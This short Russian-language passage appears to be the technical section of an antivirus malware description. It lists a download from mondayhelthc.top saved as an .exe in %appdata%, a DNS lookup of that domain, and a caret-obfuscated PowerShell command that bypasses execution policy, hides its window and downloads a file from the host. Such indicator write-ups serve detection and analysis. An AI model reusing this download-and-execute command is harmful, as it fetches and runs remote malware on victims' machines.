Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWe^rS^HeLL.^E^x^E -execUTI^OnP^olIc^Y b^y^PAs^S ^-N^O^Pro^fiLE -w^I^nDo^W^s^tyle ^HIdDeN^ (Ne^w-^O^BJec^t SYs^T^em.ne^T^.^webcL^iEnT^)^.d^Ow^nLo^ad^FI^le('http://mondayhelthc.t...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "poWe^rS^HeLL.^E^x^E -execUTI^OnP^olIc^Y b^y^PAs^S ^-N^O^Pro^fiLE -w^I^nDo^W^s^tyle ^HIdDeN^ (Ne^w-^O^BJec^t SYs^T^em.ne^T^.^webcL^iEnT^)^.d^Ow^nLo^ad^FI^le('http://mondayhelthc.t...' (со скрытым окном)